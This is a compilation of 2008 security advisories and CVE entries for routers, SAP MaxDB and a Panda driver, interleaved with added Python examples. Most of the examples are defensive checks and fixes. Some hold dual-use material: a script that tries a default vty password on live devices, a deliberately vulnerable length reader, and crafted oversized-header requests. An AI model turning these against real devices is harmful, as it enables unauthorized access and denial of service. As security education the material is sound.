TITLE: Speedport W500 b_banner.stm Password Disclosure
SECUNIA ADVISORY ID: SA29414
VERIFY ADVISORY: http://secunia.com/advisories/29414/
CRITICAL: Moderately critical
IMPACT: Security Bypass
WHERE: From local network
OPERATING SYSTEM: T-Com Speedport W500 http://secunia.com/product/18002/
DESCRIPTION: A vulnerability has been reported in the Speedport W500 router, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to the login page (b_banner.stm) containing the password in plain text, which can be exploited to disclose the password and bypass the login mechanism.
SOLUTION: Restrict access to the login page.
PROVIDED AND/OR DISCOVERED BY: mutax
ORIGINAL ADVISORY: http://www.gnucitizen.org/projects/router-hacking-challenge/
----------------------------------------------------------------------
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
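An added example, not from the advisory or the Speedport firmware: a check that pulls credential material out of a fetched login page, which is the whole of the b_banner.stm finding. The sample HTML is constructed for the example and does not reproduce the real page; every field name other than pwd is an assumption.

```python
import re
from html.parser import HTMLParser

# Field names that should never arrive prefilled from the server.
SENSITIVE_NAMES = re.compile(r"(pass|pwd|pin|secret|key)", re.IGNORECASE)
# Inline-script assignments such as: var adminPwd = "..."
JS_ASSIGN = re.compile(r"""(\w*(?:pass|pwd|pin)\w*)\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE)


class _PageCollector(HTMLParser):
    """Collect every <input> element and the text of every inline <script>."""

    def __init__(self):
        super().__init__()
        self.inputs = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def find_credential_leaks(html):
    """Return [(where, name, value)] for password-like fields or script variables that
    the page delivers with a non-empty value, i.e. secrets readable by anyone who can GET it."""
    page = _PageCollector()
    page.feed(html)
    leaks = []
    for attrs in page.inputs:
        name = attrs.get("name") or attrs.get("id") or ""
        value = attrs.get("value") or ""
        field_type = (attrs.get("type") or "").lower()
        if value and (field_type == "password" or SENSITIVE_NAMES.search(name)):
            leaks.append(("input", name, value))
    for script in page.scripts:
        for name, value in JS_ASSIGN.findall(script):
            leaks.append(("script", name, value))
    return leaks


# Constructed login page: one hidden pwd field and one script variable leak the
# password; the empty password box and the prefilled username are not findings.
SAMPLE_LOGIN_PAGE = """
<html><body>
<form name="login" method="post" action="/cgi-bin/login.cgi">
  <input type="hidden" name="pwd" value="s3cret!">
  <input type="password" name="pws" value="">
  <input type="text" name="user" value="admin">
  <input type="submit" value="Login">
</form>
<script>var adminPwd = "s3cret!";</script>
</body></html>
"""
```

Run it over the body of an unauthenticated GET to the login URL of a device under test; any hit means the login form is decoration, as it is here, and the real fix is server-side (never emit the stored secret), not the "restrict access" workaround alone.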
VAR-200803-0059 CVE-2008-1263 Linksys WRT54G router Config.bin sensitive information disclosure vulnerability CVSS V2: 4.0
CVSS V3: -
Severity: MEDIUM
The Linksys WRT54G router stores passwords and keys in cleartext in the Config.bin file, which might allow remote authenticated users to obtain sensitive information via an HTTP request for the top-level Config.bin URI. Linksys WRT54G Router is prone to an information-disclosure vulnerability
VAR-200803-0060 CVE-2008-1264 Linksys WRT54G router default FTP password allows access to sensitive files such as nvram.cfg CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
The Linksys WRT54G router has "admin" as its default FTP password, which allows remote attackers to access sensitive files including nvram.cfg, a file that lists all HTML documents, and an ELF executable file. Linksys WRT54G Router is prone to a remote security vulnerability
VAR-200803-0061 CVE-2008-1265 Linksys WRT54G router FTP interface denial of service (DoS) vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
The Linksys WRT54G router allows remote attackers to cause a denial of service (device restart) via a long username and password to the FTP interface. Linksys WRT54G Router is prone to a denial-of-service vulnerability
VAR-200803-0064 CVE-2008-1268 Linksys WRT54G 7 router FTP server unauthenticated session establishment vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
The FTP server on the Linksys WRT54G 7 router with 7.00.1 firmware does not verify authentication credentials, which allows remote attackers to establish an FTP session by sending an arbitrary username and password. WRT54G v1.0 is prone to a remote security vulnerability
VAR-200803-0063 CVE-2008-1267 Siemens SpeedStream 'basehelp_English.htm' HTTP Request Remote Denial Of Service Vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
The Siemens SpeedStream 6520 router allows remote attackers to cause a denial of service (web interface crash) via an HTTP request to basehelp_English.htm with a large integer in the Content-Length field. Siemens SpeedStream 6520 is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted HTTP requests: a request for basehelp_English.htm whose Content-Length header carries a large integer crashes the web interface.

----------------------------------------------------------------------
TITLE: Siemens SpeedStream 6520 HTTP Request Processing Denial of Service
SECUNIA ADVISORY ID: SA29325
VERIFY ADVISORY: http://secunia.com/advisories/29325/
CRITICAL: Less critical
IMPACT: DoS
WHERE: From local network
OPERATING SYSTEM: Siemens SpeedStream 6520 http://secunia.com/product/18085/
DESCRIPTION: laurent has reported a vulnerability in Siemens SpeedStream 6520, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error when processing HTTP requests containing an overly large "Content-Length" header. This can be exploited to cause the web service to crash via e.g. a specially crafted HTTP POST request.
SOLUTION: Restrict network access to the web service.
PROVIDED AND/OR DISCOVERED BY: laurent
ORIGINAL ADVISORY: http://www.gnucitizen.org/projects/router-hacking-challenge/
----------------------------------------------------------------------
VAR-200803-0332 CVE-2008-1160 ZyXEL ZyWALL 1050 hard-coded Quagga/Zebra password privilege acquisition vulnerability CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
ZyXEL ZyWALL 1050 has a hard-coded password for the Quagga and Zebra processes that is not changed when it is set by a user, which allows remote attackers to gain privileges. ZyXEL ZyWALL 1050 devices contain a default password for their Quagga and Zebra daemon processes. The device fails to change the default password when a legitimate user sets a new password. Attackers can use this default password to gain unauthorized access to the device. By gaining administrative access to Quagga or Zebra, an attacker can modify network routes on the device, possibly redirecting traffic or denying network service to legitimate users. The attacker may also be able to exploit latent vulnerabilities in the daemon itself. ZyWALL 1050 is vulnerable; other devices may also be affected.

----------------------------------------------------------------------
TITLE: ZyXEL ZyWALL 1050 Undocumented Account Security Issue
SECUNIA ADVISORY ID: SA29237
VERIFY ADVISORY: http://secunia.com/advisories/29237/
CRITICAL: Less critical
IMPACT: Security Bypass
WHERE: From local network
OPERATING SYSTEM: ZyXEL ZyWALL Series http://secunia.com/product/147/
DESCRIPTION: Pranav Joshi has reported a security issue in ZyXEL ZyWALL 1050, which can be exploited by malicious people to bypass certain security restrictions. This can be exploited to gain access to the quagga daemon (TCP ports 2601, 2602, and 2604) and e.g. view and manipulate routing information. The security issue is reported in ZyXEL ZyWALL 1050.
SOLUTION: Restrict network access to the affected services.
PROVIDED AND/OR DISCOVERED BY: Pranav Joshi
----------------------------------------------------------------------
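An added example (not ZyXEL, Quagga or Secunia code): a Python check for exactly the failure mode above, that a vty still opens a shell for the factory password after the administrator has set a new one, together with a constructed fake daemon so it can be run offline. DEFAULT_PASSWORD and the prompt text of the fake daemon are placeholders; the advisory does not disclose the real hard-coded value.

```python
import socket
import threading

# Placeholder for the hard-coded vty password; the advisory does not disclose the real value.
DEFAULT_PASSWORD = "factory-default"


def _read_until(sock, markers, timeout):
    """Read until any marker appears, the peer closes, or the timeout expires."""
    sock.settimeout(timeout)
    buf = b""
    while not any(m in buf for m in markers):
        try:
            chunk = sock.recv(512)
        except socket.timeout:
            break
        if not chunk:
            break
        buf += chunk
    return buf


def vty_accepts_password(host, port, password, timeout=3.0):
    """Connect to a Quagga/Zebra vty (2601 zebra, 2602 ripd, 2604 ospfd), offer one
    password, and report True if the daemon opened a shell (prompt ending in '>' or
    '#') rather than printing 'Password:' again."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        banner = _read_until(sock, [b"Password:"], timeout)
        if b"Password:" not in banner:
            raise RuntimeError("no vty password prompt on %s:%d" % (host, port))
        sock.sendall(password.encode() + b"\r\n")
        reply = _read_until(sock, [b"> ", b"# ", b"Password:"], timeout)
        try:
            sock.sendall(b"quit\r\n")
        except OSError:
            pass                      # daemon may already have closed the connection
    return b"Password:" not in reply and reply.rstrip().endswith((b">", b"#"))


def audit_default_password(host, ports, default_password=DEFAULT_PASSWORD):
    """Ports on which the default password still opens a vty shell."""
    return [p for p in ports if vty_accepts_password(host, p, default_password)]


def start_fake_vty(configured_password, host="127.0.0.1"):
    """Constructed stand-in for the buggy daemon: it honours the administrator's
    password *and* the baked-in default. Returns the port it listens on."""
    accepted = {configured_password, DEFAULT_PASSWORD}
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                conn.sendall(b"\r\nUser Access Verification\r\n\r\nPassword: ")
                line = _read_until(conn, [b"\n"], 5.0).strip()
                if line.decode("utf-8", "replace") in accepted:
                    conn.sendall(b"\r\nzywall> ")
                else:
                    conn.sendall(b"\r\nPassword: ")

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]
```

Against a real device, run audit_default_password(router_ip, [2601, 2602, 2604]) after changing the vty password through the normal administrative path; a non-empty result is the bug. The check sends one password per connection and quits, so it does not trip the daemon's failed-login limit on a single session.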
VAR-200803-0282 CVE-2008-0307 SAP MaxDB vserver integer signedness error vulnerability CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Integer signedness error in vserver in SAP MaxDB 7.6.0.37, and possibly other versions, allows remote attackers to execute arbitrary code via unknown vectors that trigger heap corruption. SAP MaxDB is prone to a heap-based memory-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Successfully exploiting this issue will compromise the affected application and possibly the underlying computer. This issue affects MaxDB 7.6.0.37 running on the Linux operating system. Other versions running on different platforms may also be affected.

----------------------------------------------------------------------
TITLE: MaxDB Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA29312
VERIFY ADVISORY: http://secunia.com/advisories/29312/
CRITICAL: Highly critical
IMPACT: Privilege escalation, System access
WHERE: From remote
SOFTWARE: MaxDB 7.x http://secunia.com/product/4012/
DESCRIPTION: Some vulnerabilities have been reported in MaxDB, which can be exploited by malicious, local users to gain escalated privileges, and by malicious people to potentially compromise a vulnerable system.
2) An error exists within the "sdbstarter" program when handling environment variables. Successful exploitation requires that the attacker is a member of the "sdba" group.
PROVIDED AND/OR DISCOVERED BY: An anonymous researcher, reported via iDefense.
ORIGINAL ADVISORY: iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=670
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=669
----------------------------------------------------------------------

iDefense Security Advisory 03.10.08
http://labs.idefense.com/intelligence/vulnerabilities/
Mar 10, 2008

I. BACKGROUND
SAP's MaxDB is a database software product. MaxDB was released as open source from version 7.5 up to version 7.6.00. Later versions are no longer open source but are available for download from the SAP SDN website (sdn.sap.com) as a community edition with free community support for public use beyond the scope of SAP applications. The "vserver" program is responsible for accepting and handling communication with remote database clients. For more information, visit the product's website at the following URL. https://www.sdn.sap.com/irj/sdn/maxdb

II. DESCRIPTION
After accepting a connection, the "vserver" process forks and reads parameters from the client into various structures. When doing so, it trusts values sent from the client to be valid. By sending a specially crafted request, an attacker can cause heap corruption. This leads to a potentially exploitable memory corruption condition.

III. ANALYSIS
In order to exploit this vulnerability, an attacker must be able to establish a TCP session on port 7210 with the target host. Additionally, the attacker must know the name of an active database on the server. Since this service uses the fork() system call once a connection has been accepted, an attacker can repeatedly attempt to exploit this vulnerability. Some exploitation attempts may result in the database process ceasing to run, in which case further exploitation attempts will not be possible.

IV. DETECTION
iDefense has confirmed the existence of this vulnerability in SAP AG's MaxDB version 7.6.0.37 on Linux.

V. WORKAROUND
Employing firewalls to limit access to the affected service will mitigate exposure to this vulnerability.

VI. VENDOR RESPONSE
SAP AG has addressed this vulnerability by releasing a new version of MaxDB. For more information, consult SAP note 1140135.

VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0307 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE
12/06/2007 Initial vendor notification
12/10/2007 Initial vendor response
03/10/2008 Coordinated public disclosure

IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events http://labs.idefense.com/

X. LEGAL NOTICES
Copyright © 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
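An added example illustrating the bug class, not MaxDB code: the advisory gives no wire format, so the packet layout (a 4-byte little-endian length followed by the parameter bytes) and MAX_PARAM are assumptions. The vulnerable reader reproduces the signedness mistake the advisory describes; the hardened reader shows the checks that close it.

```python
import struct

MAX_PARAM = 4096  # assumed: largest single client parameter the server will buffer


def vulnerable_read_param(packet):
    """Bug class from the advisory: the length arrives as a signed 32-bit int, is only
    checked against an upper bound, then used as an unsigned size. A negative length
    passes the check and becomes a ~4 GiB copy when cast to size_t, which is the heap
    corruption. Returns (size the copy would use, bytes actually present)."""
    (length,) = struct.unpack_from("<i", packet, 0)
    if length > MAX_PARAM:                   # -1 > 4096 is False: check passed
        raise ValueError("parameter too long")
    copy_len = length & 0xFFFFFFFF           # what a cast to unsigned/size_t does in C
    return copy_len, packet[4:4 + copy_len]


def hardened_read_param(packet):
    """Decode the length as unsigned, bound it on both sides, and confirm the bytes
    it claims are really in the packet before any buffer is sized or filled."""
    if len(packet) < 4:
        raise ValueError("short packet")
    (length,) = struct.unpack_from("<I", packet, 0)
    if not 0 < length <= MAX_PARAM:
        raise ValueError(f"length {length} out of range")
    if len(packet) - 4 < length:
        raise ValueError("packet shorter than declared length")
    return length, packet[4:4 + length]


def rejected(reader, packet):
    """True if the reader refuses the packet."""
    try:
        reader(packet)
    except ValueError:
        return True
    return False


# Constructed packets: well-formed, negative length, and length larger than the payload.
GOOD_PACKET = struct.pack("<I", 5) + b"hello"
NEGATIVE_LENGTH_PACKET = struct.pack("<i", -1) + b"A" * 8
OVERLONG_PACKET = struct.pack("<I", 100) + b"A" * 8
```

In Python the slice simply returns the eight bytes that exist; in the C original the same 0xFFFFFFFF is the count handed to the copy into a heap buffer sized for MAX_PARAM, and the over-declared length in the third packet reads past the end of the receive buffer. Both are caught by the hardened reader before any memory is touched.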
VAR-200803-0062 CVE-2008-1266 D-Link DI-524 router web interface buffer overflow vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Multiple buffer overflows in the web interface on the D-Link DI-524 router allow remote attackers to cause a denial of service (device crash) or possibly have unspecified other impact via (1) a long username or (2) an HTTP header with a large name and an empty value. D-Link is an internationally renowned provider of network equipment and solutions, and its products include a variety of router equipment. D-Link DI-524 has multiple vulnerabilities in processing user requests. Remote attackers may use these vulnerabilities to make device services unavailable or perform cross-site scripting attacks. The D-Link DI-524 router does not properly handle the login request sent to the web interface, causing the device to crash. The D-Link DI-604 router does not properly filter the input passed to the rf parameter in prim.htm before returning it to the user, which could cause arbitrary HTML and script code to be executed in the user's browser session. The D-Link DSL-G604T router does not properly filter the input passed to the var:category parameter in cgi-bin/webcm before returning it to the user, which could cause arbitrary HTML and script code to be executed in the user's browser session. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. D-Link is a network company founded by the Taiwan D-Link Group, dedicated to the R&D, production and marketing of LAN, broadband network, wireless network, voice network and related network equipment.

----------------------------------------------------------------------
TITLE: D-Link DI-524 Denial of Service Vulnerabilities
SECUNIA ADVISORY ID: SA29366
VERIFY ADVISORY: http://secunia.com/advisories/29366/
CRITICAL: Less critical
IMPACT: DoS
WHERE: From local network
OPERATING SYSTEM: D-Link DI-524 http://secunia.com/product/8028/
DESCRIPTION: laurent has reported two vulnerabilities in D-Link DI-524, which can be exploited by malicious people to cause a DoS (Denial of Service).
SOLUTION: Restrict access to trusted users only.
PROVIDED AND/OR DISCOVERED BY: laurent
ORIGINAL ADVISORY: http://www.gnucitizen.org/projects/router-hacking-challenge/
----------------------------------------------------------------------
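The SpeedStream 6520 entry above (oversized Content-Length) and this D-Link DI-524 entry (oversized header name with an empty value) are the same bug class: an embedded web server that interprets request headers before bounding them. As an added example, not vendor code, here is a Python header-block parser with the limits such a server needs, run against constructed requests shaped like both reports. The limit values are assumptions.

```python
MAX_HEADER_LINE = 1024            # assumed per-line limit
MAX_HEADER_NAME = 64              # assumed per-name limit
MAX_HEADERS = 32
MAX_CONTENT_LENGTH = 64 * 1024    # largest body this device is willing to buffer


class BadRequest(ValueError):
    pass


def parse_content_length(value, limit=MAX_CONTENT_LENGTH):
    """Strict 1*DIGIT parse, bounded before any buffer is sized. int()/atoi()-style
    parsing would accept '-1' or '1e9', and an unbounded value wraps a 32-bit
    counter or exhausts the heap on a small device."""
    digits = value.strip()
    if not (digits.isascii() and digits.isdigit()):
        raise BadRequest(f"Content-Length not a decimal integer: {value!r}")
    if len(digits) > 10:
        raise BadRequest("Content-Length has too many digits")
    length = int(digits)
    if length > limit:
        raise BadRequest(f"Content-Length {length} exceeds limit {limit}")
    return length


def parse_headers(raw):
    """Parse b'Name: value\\r\\n...\\r\\n\\r\\n' into a dict, enforcing line, name and
    count limits on every header before interpreting any of them."""
    lines = raw.split(b"\r\n")
    if lines[-2:] != [b"", b""]:
        raise BadRequest("header block not terminated by CRLF CRLF")
    headers = {}
    for line in lines[:-2]:
        if len(line) > MAX_HEADER_LINE:
            raise BadRequest("header line too long")
        name, sep, value = line.partition(b":")
        if not sep or not name or not name.isascii() or b" " in name or b"\t" in name:
            raise BadRequest(f"malformed header name {name[:16]!r}")
        if len(name) > MAX_HEADER_NAME:
            raise BadRequest(f"header name too long ({len(name)} bytes)")
        if len(headers) >= MAX_HEADERS:
            raise BadRequest("too many headers")
        headers[name.decode("ascii").lower()] = value.strip().decode("latin-1")  # empty value is legal
    if "content-length" in headers:
        headers["content-length"] = parse_content_length(headers["content-length"])
    return headers


def check_request(raw):
    """(True, headers) or (False, reason): callers log and drop, never crash."""
    try:
        return True, parse_headers(raw)
    except BadRequest as exc:
        return False, str(exc)


# Constructed requests: a normal one and the two advisory-shaped ones.
NORMAL = b"Host: 192.168.1.1\r\nContent-Length: 12\r\n\r\n"
HUGE_CONTENT_LENGTH = b"Host: 192.168.1.1\r\nContent-Length: 4294967295\r\n\r\n"   # SpeedStream 6520 shape
LONG_EMPTY_HEADER = b"A" * 200 + b":\r\n\r\n"                                     # DI-524 shape
```

The order matters: each line is bounded as it is read, so a 200-byte header name is rejected before anything is copied, and Content-Length is parsed into a bounded integer before any allocation. The empty value in the DI-524 request is itself legal HTTP; it is the name length that has to be refused.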
VAR-200803-0281 CVE-2008-0306 SAP MaxDB sdbstarter arbitrary command execution vulnerability

Related entries in the VARIoT exploits database: VAR-E-200803-0463
CVSS V2: 6.9
CVSS V3: -
Severity: MEDIUM
sdbstarter in SAP MaxDB 7.6.0.37, and possibly other versions, allows local users to execute arbitrary commands by using unspecified environment variables to modify configuration settings. SAP MaxDB is prone to a local privilege-escalation vulnerability. Exploiting this issue allows local attackers to execute arbitrary code with superuser privileges. This will lead to the complete compromise of an affected computer. This issue affects MaxDB 7.6.0.37 on both Linux and Solaris platforms. Other UNIX variants are most likely affected. Microsoft Windows versions are not vulnerable to this issue.

iDefense Security Advisory 03.10.08
http://labs.idefense.com/intelligence/vulnerabilities/
Mar 10, 2008

I. BACKGROUND
SAP's MaxDB is a database software product. MaxDB was released as open source from version 7.5 up to version 7.6.00. Later versions are no longer open source but are available for download from the SAP SDN website (sdn.sap.com) as a community edition with free community support for public use beyond the scope of SAP applications. The "sdbstarter" program is set-uid root and installed by default. For more information, visit the product's website at the following URL. https://www.sdn.sap.com/irj/sdn/maxdb

II. DESCRIPTION
Local exploitation of a design error in the "sdbstarter" program, as distributed with SAP AG's MaxDB, could allow attackers to elevate privileges to root. This vulnerability exists due to a design error in the handling of certain environment variables. These variables are used to specify the configuration settings to be used by various MaxDB components.

III. ANALYSIS
To exploit this vulnerability, an attacker must be able to execute the "sdbstarter" program. In a default installation, this requires that the attacker be a member of the "sdba" group. It is important to note that this vulnerability is not architecture dependent.

IV. DETECTION
iDefense has confirmed the existence of this vulnerability in SAP AG's MaxDB version 7.6.0.37 on both Linux and Solaris. Windows releases do not include the "sdbstarter" program.

V. WORKAROUND
iDefense is currently unaware of any effective workaround for this issue.

VI. VENDOR RESPONSE
SAP AG has addressed this vulnerability by releasing a new version of MaxDB. For more information, consult SAP note 1140135.

VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0306 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE
12/05/2007 Initial vendor notification
12/06/2007 Initial vendor response
03/10/2008 Coordinated public disclosure

IX. CREDIT
This vulnerability was discovered by Joshua J. Drake of VeriSign iDefense Labs.

Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events http://labs.idefense.com/

X. LEGAL NOTICES
Copyright © 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

----------------------------------------------------------------------
TITLE: MaxDB Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA29312
VERIFY ADVISORY: http://secunia.com/advisories/29312/
CRITICAL: Highly critical
IMPACT: Privilege escalation, System access
WHERE: From remote
SOFTWARE: MaxDB 7.x http://secunia.com/product/4012/
DESCRIPTION: Some vulnerabilities have been reported in MaxDB, which can be exploited by malicious, local users to gain escalated privileges, and by malicious people to potentially compromise a vulnerable system.
1) A signedness error within the "vserver" component can be exploited to cause a heap corruption via a specially crafted packet sent to the port which "vserver" is listening on (port 7210/TCP by default).
PROVIDED AND/OR DISCOVERED BY: An anonymous researcher, reported via iDefense.
ORIGINAL ADVISORY: iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=670
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=669
----------------------------------------------------------------------
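An added example, not MaxDB's sdbstarter: the advisory does not name the environment variables involved, so LAUNCHER_CONFIG_DIR and the paths below are hypothetical. config_path() contrasts a set-uid launcher that lets the caller's environment choose where its configuration comes from with one whose location is fixed, and sanitize_env() builds the environment such a program should hand to anything it executes.

```python
import os
import re

# Hypothetical names: the advisory does not say which variables sdbstarter honoured.
CONFIG_DIR_VAR = "LAUNCHER_CONFIG_DIR"
FIXED_CONFIG_DIR = "/etc/launcher"          # compiled-in location, assumed
SAFE_PATH = "/usr/bin:/bin"
ALLOWED_VARS = {"LANG", "LC_ALL", "TZ"}     # allow-list for a privileged launcher
VAR_NAME = re.compile(r"^[A-Z_][A-Z0-9_]*$")


def config_path(caller_env, trust_env):
    """trust_env=True reproduces the vulnerable pattern: whoever runs the set-uid
    binary chooses where its configuration (and so which commands it will run as
    root) is read from. trust_env=False is the fix: the location is fixed in the
    program and the caller's environment is never consulted for it."""
    if trust_env and CONFIG_DIR_VAR in caller_env:
        return os.path.join(caller_env[CONFIG_DIR_VAR], "launcher.conf")
    return os.path.join(FIXED_CONFIG_DIR, "launcher.conf")


def sanitize_env(caller_env):
    """Environment a set-uid program should pass to anything it execs: allow-listed
    variables only, well-formed names, no NUL bytes, and a PATH the program chose.
    Loader variables such as LD_PRELOAD and the caller's PATH never get through."""
    clean = {}
    for name, value in caller_env.items():
        if name in ALLOWED_VARS and VAR_NAME.match(name) and "\0" not in value:
            clean[name] = value
    clean["PATH"] = SAFE_PATH
    return clean
```

A launcher built this way reads config_path(os.environ, trust_env=False) and starts its children with os.execve(binary, argv, sanitize_env(os.environ)); membership of an operator group such as "sdba" then grants the ability to start the database, not to decide what runs as root.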
VAR-200803-0165 CVE-2008-1242 Belkin F5D7230-4 router control panel authentication bypass vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
The control panel on the Belkin F5D7230-4 router with firmware 9.01.10 maintains authentication state by IP address, which allows remote attackers to bypass authentication by establishing a session from a source IP address of a previously authenticated user, a different vulnerability than CVE-2005-3802. Attackers can exploit this issue to gain access to affected routers using the account of a previously authenticated user. Belkin F5D7230-4 running firmware 9.01.10 is vulnerable; other devices and firmware versions may also be affected.

----------------------------------------------------------------------
TITLE: Belkin Wireless G Router Security Bypass and Denial of Service
SECUNIA ADVISORY ID: SA29345
VERIFY ADVISORY: http://secunia.com/advisories/29345/
CRITICAL: Less critical
IMPACT: Security Bypass, DoS
WHERE: From local network
OPERATING SYSTEM: Belkin Wireless G Router http://secunia.com/product/6130/
DESCRIPTION: Some security issues and a vulnerability have been reported in the Belkin Wireless G Router, which can be exploited by malicious people to bypass certain security restrictions or cause a DoS (Denial of Service).
2) An error exists within the enforcing of permissions in cgi-bin/setup_dns.exe. This can be exploited to perform restricted administrative actions by directly accessing the vulnerable script.
3) An error exists in the cgi-bin/setup_virtualserver.exe script when processing HTTP POST data. This can be exploited to deny further administrative access to an affected device via a specially crafted HTTP POST request with a "Connection: Keep-Alive" header.
The security issues and the vulnerability are reported in model F5D7230-4, firmware version 9.01.10.
SOLUTION: Restrict network access to the router's web interface.
PROVIDED AND/OR DISCOVERED BY: loftgaia
ORIGINAL ADVISORY: http://www.gnucitizen.org/projects/router-hacking-challenge/
----------------------------------------------------------------------
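An added example (not Belkin firmware) contrasting the scheme the advisory describes, login state keyed by source address, with a per-login bearer token. Credentials and addresses are constructed for the example.

```python
import secrets
import time

CREDENTIALS = {"admin": "constructed-pw"}   # constructed for the example


class IpKeyedAuth:
    """The scheme the advisory describes: the authentication state is the source address."""

    def __init__(self):
        self._authenticated_ips = set()

    def login(self, ip, user, password):
        if CREDENTIALS.get(user) != password:
            return None
        self._authenticated_ips.add(ip)
        return "ok"                         # nothing secret is issued to the client

    def is_authenticated(self, ip, token=None):
        return ip in self._authenticated_ips   # anyone presenting this address is "admin"


class TokenKeyedAuth:
    """Fix: state lives in a random bearer token issued at login, with an expiry; the
    address plays no part in the decision, so sharing or spoofing it gains nothing."""

    def __init__(self, ttl_seconds=600):
        self._expiry = {}
        self._ttl = ttl_seconds

    def login(self, ip, user, password):
        if CREDENTIALS.get(user) != password:
            return None
        token = secrets.token_urlsafe(32)
        self._expiry[token] = time.monotonic() + self._ttl
        return token

    def is_authenticated(self, ip, token):
        expiry = self._expiry.get(token)
        return expiry is not None and time.monotonic() < expiry

    def logout(self, token):
        self._expiry.pop(token, None)


def attacker_gets_in(auth, admin_ip):
    """The admin logs in from admin_ip; a second client that merely shares (or spoofs)
    that address then requests an admin page without any token. Returns the verdict."""
    admin_token = auth.login(admin_ip, "admin", "constructed-pw")
    assert admin_token is not None
    return auth.is_authenticated(admin_ip, None)
```

Behind NAT, on a shared host, or with a spoofed source address, the second client is indistinguishable from the administrator to the IP-keyed scheme; the token scheme requires possession of a secret that only the login response ever carried, and it expires.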
VAR-200803-0065 CVE-2008-1269 Alice Gate 2 Plus Wi-Fi router admin panel Wi-Fi encryption disabling vulnerability CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
cp06_wifi_m_nocifr.cgi in the admin panel on the Alice Gate 2 Plus Wi-Fi router does not verify authentication credentials, which allows remote attackers to disable Wi-Fi encryption via a certain request. Alice Gate2 Plus Wi-Fi is prone to a remote security vulnerability
VAR-200803-0457 CVE-2008-1471 Panda Internet Security cpoint.sys driver denial of service (DoS) vulnerabilities CVSS V2: 7.2
CVSS V3: -
Severity: HIGH
The cpoint.sys driver in Panda Internet Security 2008 and Antivirus+ Firewall 2008 allows local users to cause a denial of service (system crash or kernel panic), overwrite memory, or execute arbitrary code via a crafted IOCTL request that triggers an out-of-bounds write of kernel memory. Panda Internet Security/Antivirus+Firewall 2008 is prone to a vulnerability that allows local attackers to corrupt kernel memory. This vulnerability occurs because the application fails to sufficiently validate IOCTL requests.
----------------------------------------------------------------------
TITLE: Panda Products cpoint.sys Privilege Escalation Vulnerabilities
SECUNIA ADVISORY ID: SA29311
VERIFY ADVISORY: http://secunia.com/advisories/29311/
CRITICAL: Less critical
IMPACT: Privilege escalation, DoS
WHERE: Local system
SOFTWARE:
Panda Internet Security 2008
http://secunia.com/product/17681/
Panda Antivirus + Firewall 2008
http://secunia.com/product/17905/
DESCRIPTION:
